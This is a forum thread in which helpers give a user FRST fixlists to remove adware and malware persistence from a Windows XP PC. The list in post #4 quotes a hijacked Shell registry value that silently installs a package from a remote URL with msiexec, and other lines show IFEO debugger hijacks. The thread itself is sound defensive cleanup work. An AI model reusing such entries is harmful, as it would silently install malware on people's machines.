Elektroda.pl

Please check - FRST logs

piotrek303 17 Jun 2017 00:46 468 6
  • Helpful post
    #2 17 Jun 2017 06:31
    krzychupar
    Level 41  

    Uninstall:
    AVG Web TuneUp
    AVG Protection

    Open the system Notepad and paste:

    Task: C:\WINDOWS\Tasks\AVG EUpdate Task.job => C:\Program Files\AVG\Setup AVG Technologies  0 ߡ    0ߡ   
    Task: C:\WINDOWS\Tasks\Opera scheduled Autoupdate 1460049706.job => C:\Program Files\Opera\launcher.exe
    Task: C:\WINDOWS\Tasks\Powiadomienie o zakończeniu obsługi systemu Microsoft Windows XP — co miesiąc.job => C:\WINDOWS\system32\xp_eos.exe
    Task: C:\WINDOWS\Tasks\Powiadomienie o zakończeniu obsługi systemu Microsoft Windows XP — logowanie.job => C:\WINDOWS\system32\xp_eos.exe
    ShortcutWithArgument: C:\Documents and Settings\Adam\Menu Start\Programy\Akcesoria\Narzędzia systemowe\Internet Explorer (bez dodatków).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.nuesearch.com/?type=sc&ts=14708610...=wpm0808&uid=ST9250827AS_5RG1THAYXXXX5RG1THAY
    ShortcutWithArgument: C:\Documents and Settings\Adam\Dane aplikacji\Microsoft\Internet Explorer\Quick Launch\Opera.lnk -> C:\Program Files\Opera\launcher.exe (Opera Software) -> hxxp://www.nuesearch.com/?type=sc&ts=14708610...=wpm0808&uid=ST9250827AS_5RG1THAYXXXX5RG1THAY
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\Run: [] => [X]
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {008a60b4-b147-11e5-b0d4-0022152be7c9} - H:\RunDlg.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {008a60ba-b147-11e5-b0d4-02275404057d} - I:\HTC_Sync_Manager_PC.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {015add16-b2e5-11e1-82b2-0022152be7c9} - G:\MicroLauncher.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {04c9565b-4271-11e0-8203-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {04c9565d-4271-11e0-8203-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {05c81787-8dda-11e4-ac5b-0022152be7c9} - H:\HTC_Sync_Manager_PC.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {082fa84e-a1cf-11e1-82a8-0022152be7c9} - G:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {0e1e0d66-4012-11df-8188-0022152be7c9} - H:\AutoRunCardDetector.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {19b6d443-0d16-11e0-81f2-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {19b6d445-0d16-11e0-81f2-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {1a2cb74c-4290-11e1-8279-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {278d6b50-fcd4-11df-81e9-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {290f6ba8-6a9f-11df-819f-0015afc3ece6} - H:\AutoRunCardDetector.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {31770d26-d2c0-11df-81de-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {31770d28-d2c0-11df-81de-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {31770d2a-d2c0-11df-81de-0015afc3ece6} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {375fea2a-8cfb-11de-80b7-0015afc3ece6} - I:\.\EncryptionTool\MaxtorEncryption.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {38029afa-54fa-11df-8197-0022152be7c9} - H:\AutoRunCardDetector.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {3c43d11d-ed0a-11df-81e7-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {3c43d11f-ed0a-11df-81e7-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {3c43d121-ed0a-11df-81e7-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {419cb868-364b-11e1-8271-0022152be7c9} - G:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {481a0d4c-e83e-11df-81e6-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {481a0d4f-e83e-11df-81e6-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {4effef9c-7db0-11e1-82a2-0022152be7c9} - I:\AutoRunCardDetector.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {56366b4e-e4c6-11df-81e4-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {56366b50-e4c6-11df-81e4-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {56366b52-e4c6-11df-81e4-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {56366b54-e4c6-11df-81e4-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {5e915840-f4dc-11e1-82d2-0022152be7c9} - H:\MicroLauncher.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {5e915844-f4dc-11e1-82d2-0022152be7c9} - G:\AutoRunCardDetector.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {68c1bd68-d260-11df-81dc-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {72c9d726-d244-11df-81da-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {72c9d728-d244-11df-81da-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {7777bdd0-966b-11e3-83ae-0022152be7c9} - G:\MicroLauncher.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {7777bdd2-966b-11e3-83ae-0022152be7c9} - G:\MicroLauncher.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {79c47ad8-fe33-11e5-b1cc-0022152be7c9} - G:\MicroLauncher.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {7b7f1dca-e4c0-11df-81e3-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {7b7f1dcc-e4c0-11df-81e3-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {7b7f1dce-e4c0-11df-81e3-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {7df9fc91-9d91-11e0-821b-0022152be7c9} - I:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {7e3d64ab-959f-11e0-8218-0022152be7c9} - I:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {7e3d64ad-959f-11e0-8218-0022152be7c9} - I:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {7e3d64af-959f-11e0-8218-0022152be7c9} - I:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {87ce7cdc-54bc-11e0-820b-0022152be7c9} - I:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {87ce7cde-54bc-11e0-820b-0022152be7c9} - I:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {99feb76a-fecb-11dd-8010-0022152be7c9} - G:\qphdin.com
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {9f3b2caa-2b88-11df-816b-0022152be7c9} - H:\AutoRunCardDetector.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {a2c794bc-a413-11e0-821c-0022152be7c9} - I:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {a2c794be-a413-11e0-821c-0022152be7c9} - J:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {b47f74a8-f816-11df-81e8-0022152be7c9} - sojcice/obucicarapice.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {b6d67068-157b-11e4-8544-0022152be7c9} - H:\HTC_Sync_Manager_PC.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {c07cb3b6-9523-11df-81c0-0022152be7c9} - I:\LaunchU3.exe -a
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {cc5d75e0-f2be-11e0-8242-0022152be7c9} - I:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {cf462e47-9196-11e4-ac6a-0022152be7c9} - H:\HTC_Sync_Manager_PC.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {de8fd23e-e0d8-11de-811e-0015afc3ece6} - H:\LaunchU3.exe -a
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {f33fa628-47d9-11e0-8206-0022152be7c9} - H:\AutoRun.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {f6f634e8-6a5a-11de-808b-0022152be7c9} - I:\AutoRunCardDetector.exe
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\MountPoints2: {ffe67ff1-e19f-11df-81e2-0022152be7c9} - H:\AutoRun.exe
    IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
    IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
    ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files\Dropbox\Client\DropboxExt.3.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files\Dropbox\Client\DropboxExt.3.0.dll -> Brak pliku
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://securityresponse.symantec.com/avcenter/fix_homepage/
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://securityresponse.symantec.com/avcenter/fix_homepage/
    HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://securityresponse.symantec.com/avcenter/fix_homepage/
    HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\Software\Microsoft\Internet Explorer\Main,Start Page =
    SearchScopes: HKU\.DEFAULT -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
    SearchScopes: HKU\S-1-5-21-2569541432-1215264409-1273387394-1006 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-21-2569541432-1215264409-1273387394-1006 -> {56256A51-B582-467e-B8D4-7786EDA79AE0} URL =
    SearchScopes: HKU\S-1-5-21-2569541432-1215264409-1273387394-1006 -> {C3F4F817-C144-45D8-A386-3C3F7AF0A3A0} URL =
    BHO: Brak nazwy -> {6D023EBF-70B8-45A6-9ED5-556515FA0FE4} -> Brak pliku
    Toolbar: HKLM - Brak nazwy - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Brak pliku
    Toolbar: HKLM - Brak nazwy - {D3DEE18F-DB64-4BEB-9FF1-E1F0A5033E4A} - Brak pliku
    Toolbar: HKU\S-1-5-21-2569541432-1215264409-1273387394-1006 -> Brak nazwy - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Brak pliku
    Toolbar: HKU\S-1-5-21-2569541432-1215264409-1273387394-1006 -> Brak nazwy - {D3DEE18F-DB64-4BEB-9FF1-E1F0A5033E4A} - Brak pliku
    Toolbar: HKU\S-1-5-21-2569541432-1215264409-1273387394-1006 -> Brak nazwy - {463DF6D5-BEC1-4D67-B217-59DB692DFC53} - Brak pliku
    DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxps://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
    FF NewTab: C:\Documents and Settings\Adam\Dane aplikacji\Mozilla\Firefox\Profiles\zn2n7cbx.default -> hxxp://www.nicesearches.com?type=hp&ts=145988...&z=222fdd0a45bc9d2316bd3a6gdz8wet2b6bagaw7eae
    FF Homepage: C:\Documents and Settings\Adam\Dane aplikacji\Mozilla\Firefox\Profiles\zn2n7cbx.default -> about:home
    FF NetworkProxy: C:\Documents and Settings\Adam\Dane aplikacji\Mozilla\Firefox\Profiles\zn2n7cbx.default -> type", 0
    FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird => nie znaleziono
    FF Plugin HKU\S-1-5-21-2569541432-1215264409-1273387394-1006: @facebook.com/FBPlugin,version=1.0.1 -> C:\Documents and Settings\Adam\Dane aplikacji\Facebook\npfbplugin_1_0_1.dll [Brak pliku]
    FF Plugin HKU\S-1-5-21-2569541432-1215264409-1273387394-1006: @facebook.com/FBPlugin,version=1.0.3 -> C:\Documents and Settings\Adam\Dane aplikacji\Facebook\npfbplugin_1_0_3.dll [Brak pliku]
    FF Plugin HKU\S-1-5-21-2569541432-1215264409-1273387394-1006: @tools.google.com/Google Update;version=8 -> C:\Documents and Settings\Adam\Ustawienia lokalne\Dane aplikacji\Google\Update\1.2.183.39\npGoogleOneClick8.dll [Brak pliku]
    S2 Convxxxx; "C:\Documents and Settings\Adam\Dane aplikacji\ficfi\UvConverter.exe" {2C8E8C85-942B-451C-8243-97A089265577} [X]
    U2 FFModules; "C:\Program Files\ffgogogo Browser\bin\browserServer.exe" -runsvc [X]
    S3 BlueletAudio; system32\DRIVERS\blueletaudio.sys [X]
    S3 BlueletSCOAudio; system32\DRIVERS\BlueletSCOAudio.sys [X]
    S3 BT; system32\DRIVERS\btnetdrv.sys [X]
    S3 Btcsrusb; System32\Drivers\btcusb.sys [X]
    S0 BTHidEnum; System32\Drivers\vbtenum.sys [X]
    S0 BTHidMgr; System32\Drivers\BTHidMgr.sys [X]
    U2 CSHMDR; Brak ImagePath
    U2 CWASRE; Brak ImagePath
    S3 dtscsi; \SystemRoot\System32\Drivers\dtscsi.sys [X]
    S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X]
    S3 hwusbdev; system32\DRIVERS\ewusbdev.sys [X]
    S3 hwusbfake; system32\DRIVERS\ewusbfake.sys [X]
    S4 IntelIde; Brak ImagePath
    S3 massfilter; system32\drivers\massfilter.sys [X]
    S3 mdf15; \??\C:\Program Files\Clarus\Samsung SecretZone\mdf15.sys [X]
    S3 mvd21; \??\C:\Program Files\Clarus\Samsung SecretZone\mvd21.sys [X]
    S3 NPF; system32\drivers\npf.sys [X]
    U2 snare; Brak ImagePath
    S3 SymIM; system32\DRIVERS\SymIM.sys [X]
    S3 SymIMMP; system32\DRIVERS\SymIM.sys [X]
    S3 VComm; system32\DRIVERS\VComm.sys [X]
    S3 VcommMgr; System32\Drivers\VcommMgr.sys [X]
    U4 WMCoreService; Brak ImagePath
    U1 WS2IFSL; Brak ImagePath
    S3 ZTEusbmdm6k; system32\DRIVERS\ZTEusbmdm6k.sys [X]
    S3 ZTEusbnmea; system32\DRIVERS\ZTEusbnmea.sys [X]
    S3 ZTEusbser6k; system32\DRIVERS\ZTEusbser6k.sys [X]
    2017-06-16 18:51 - 2017-06-16 18:52 - 00000000 ____D C:\Documents and Settings\Adam\Ustawienia lokalne\Dane aplikacji\AVG Web TuneUp
    2017-06-16 18:46 - 2017-06-16 18:46 - 00000000 ___HD C:\$AV_AVG
    2017-06-16 17:46 - 2017-06-16 17:46 - 00000000 __HDC C:\WINDOWS\$NtUninstallWdf01009$
    2017-06-16 17:45 - 2017-06-16 23:45 - 00000292 ____H C:\WINDOWS\Tasks\Antivirus Emergency Update.job
    2017-06-04 20:00 - 2017-06-04 20:00 - 00000000 __SHD C:\found.000
    2017-05-31 11:07 - 2017-05-31 11:14 - 00000000 ____D C:\Program Files\592E87CD_cacayima
    2017-06-03 11:29 - 2017-06-03 11:29 - 00000114 _____ C:\Documents and Settings\LocalService\Dane aplikacji\WB.CFG
    2017-05-31 11:07 - 2017-05-31 11:14 - 00000000 ____D C:\Program Files\592E87CD_cacayima
    2017-06-16 23:45 - 2014-03-08 21:16 - 00000220 _____ C:\WINDOWS\Tasks\Powiadomienie o zakończeniu obsługi systemu Microsoft Windows XP — logowanie.job
    2017-06-16 20:09 - 2017-03-01 20:18 - 00000000 ____D C:\Documents and Settings\Adam\Dane aplikacji\Kyubey
    2017-06-08 15:00 - 2014-03-08 21:16 - 00000214 _____ C:\WINDOWS\Tasks\Powiadomienie o zakończeniu obsługi systemu Microsoft Windows XP — co miesiąc.job
    EmptyTemp:

    Save the file as fixlist.txt and place it in the same folder as FRST.
    Run FRST and click Fix/Napraw.

    When it has finished, post new FRST logs.

  • #4 17 Jun 2017 09:30
    Kolobos
    Computer specialist

    Back up your bookmarks from FF; the script will remove the profiles created by the infection.

    Run this Fixlist.txt for FRST:
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\Run: [Power2GoExpress] => NA
    HKU\S-1-5-21-2569541432-1215264409-1273387394-1006\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj8cNWVQNkI4NkY2OUNWNWlQMWH2MTkdMWZXRkMdOWY4RH== /q
    Startup: C:\Documents and Settings\Adam\Menu Start\Programy\Autostart\Torpedo.lnk [2014-12-16]
    FF user.js: detected! => C:\Documents and Settings\Adam\Dane aplikacji\Mozilla\Firefox\Profiles\zn2n7cbx.default\user.js [2016-04-07]
    FF NewTab: C:\Documents and Settings\Adam\Dane aplikacji\Mozilla\Firefox\Profiles\zn2n7cbx.default -> hxxp://www.nicesearches.com?type=hp&ts=145988...&z=222fdd0a45bc9d2316bd3a6gdz8wet2b6bagaw7eae
    FF NetworkProxy: C:\Documents and Settings\Adam\Dane aplikacji\Mozilla\Firefox\Profiles\zn2n7cbx.default -> type", 0
    FF SearchPlugin: C:\Documents and Settings\Adam\Dane aplikacji\Mozilla\Firefox\Profiles\zn2n7cbx.default\searchplugins\yoursites123.xml [2016-03-26]
    FF ProfilePath: C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default [2017-04-17]
    FF user.js: detected! => C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default\user.js [2016-03-30]
    FF NewTab: C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default -> chrome://quick_start/content/index.html
    C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\
    FF Homepage: C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default -> hxxp://www.google.com/
    FF NetworkProxy: C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default -> type", 0
    FF Extension: (SimilarWeb) - C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2016-04-12] [Brak podpisu cyfrowego]
    FF Extension: (FF Adr) - C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2016-08-10] [Brak podpisu cyfrowego]
    FF Extension: (Default NewTab) - C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default\Extensions\default_newtabff@gmail.com [2016-03-30] [Brak podpisu cyfrowego]
    FF Extension: (Polski Language Pack) - C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2016-03-30] [Brak podpisu cyfrowego]
    FF Extension: (Microsoft .NET Framework Assistant) - C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2016-03-30] [Brak podpisu cyfrowego]
    FF SearchPlugin: C:\Documents and Settings\Adam\Dane aplikacji\ffgogogo\ffgogogo\Profiles\zn2n7cbx.default\searchplugins\yoursites123.xml [2016-03-26]
    S4 glory; C:\Documents and Settings\Adam\Ustawienia lokalne\Dane aplikacji\glory\glory.dll [689152 2017-06-16] () [Brak podpisu cyfrowego]
    2017-06-02 15:06 - 2017-06-02 15:06 - 00000000 ____D C:\Documents and Settings\Adam\Ustawienia lokalne\Dane aplikacji\glory
    2017-05-31 21:29 - 2017-06-16 22:10 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\fjcfi
    2017-05-26 14:42 - 2017-06-16 21:53 - 00000000 ____D C:\Documents and Settings\Adam\Ustawienia lokalne\Dane aplikacji\terana
    2017-05-19 13:51 - 2017-06-16 21:31 - 00000000 ____D C:\Documents and Settings\Adam\Ustawienia lokalne\Dane aplikacji\CSHMDR
    2017-05-18 15:16 - 2017-06-16 22:09 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\cfjcf
    2017-06-16 22:10 - 2017-05-15 14:25 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\ibehb
    2017-06-16 22:10 - 2017-04-27 16:27 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\gjcgj
    2017-06-16 22:10 - 2017-04-26 12:26 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\hbeha
    2017-06-16 22:10 - 2017-04-05 12:51 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\dhadg
    2017-06-16 22:10 - 2017-04-01 17:55 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\fibei
    2017-06-16 22:10 - 2017-03-27 21:08 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\fjcfj
    2017-06-16 22:10 - 2017-03-18 14:29 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\dhadh
    2017-06-16 22:10 - 2017-03-15 16:39 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\ehadh
    2017-06-16 22:10 - 2017-03-02 13:29 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\ficfi
    2017-06-16 22:10 - 2017-02-23 12:18 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\dgjcg
    2017-06-16 22:10 - 2017-02-22 12:52 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\ehaeh
    2017-06-16 22:10 - 2017-02-08 23:44 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\ibeib
    2017-06-16 22:10 - 2016-12-16 15:18 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\gadgj
    2017-06-16 22:10 - 2016-12-08 15:49 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\icfic
    2017-06-16 22:09 - 2017-03-16 13:58 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\bfibe
    2017-06-16 22:09 - 2017-02-24 16:54 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\behbe
    2017-06-16 22:09 - 2017-02-08 12:30 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\cfibf
    2017-06-16 22:09 - 2016-11-10 18:40 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\beibe
    2017-06-16 22:08 - 2017-03-24 19:59 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\adhad
    2017-06-16 22:08 - 2017-03-09 21:19 - 00000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\aehad
    2017-06-16 21:31 - 2017-05-15 14:21 - 00000000 ____D C:\Documents and Settings\Adam\Ustawienia lokalne\Dane aplikacji\CWASRE
    2017-06-16 21:30 - 2017-05-11 11:53 - 00000000 ____D C:\Documents and Settings\Adam\Ustawienia lokalne\Dane aplikacji\NPASRE
    2017-06-16 19:57 - 2017-02-13 13:56 - 00000000 ____D C:\Documents and Settings\Adam\Dane aplikacji\WinSAPSvc
    2017-06-16 19:57 - 2016-03-26 15:42 - 00000000 ____D C:\Documents and Settings\Adam\Dane aplikacji\TSv
    2017-06-16 19:57 - 2014-09-26 16:52 - 00000000 ____D C:\Documents and Settings\Adam\Dane aplikacji\sweet-page
    2017-06-16 19:55 - 2016-08-10 22:31 - 00000000 ____D C:\Documents and Settings\Adam\Dane aplikacji\setup1
    2017-06-16 18:46 - 2017-02-06 22:39 - 00000000 ____D C:\Documents and Settings\Adam\Dane aplikacji\ficfi


    Run a full scan with Mbam and remove whatever it detects:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/
    and http://ftp.drweb.com/pub/drweb/cureit/launch.exe

    When done, post new FRST logs from a scan.

  • Helpful post
    #6 17 Jun 2017 11:53
    Kolobos
    Computer specialist

    Delete the C:\FRST folder and that's all.

  • #7 17 Jun 2017 11:57
    piotrek303
    Level 13  

    Thank you very much for the help.
    Regards.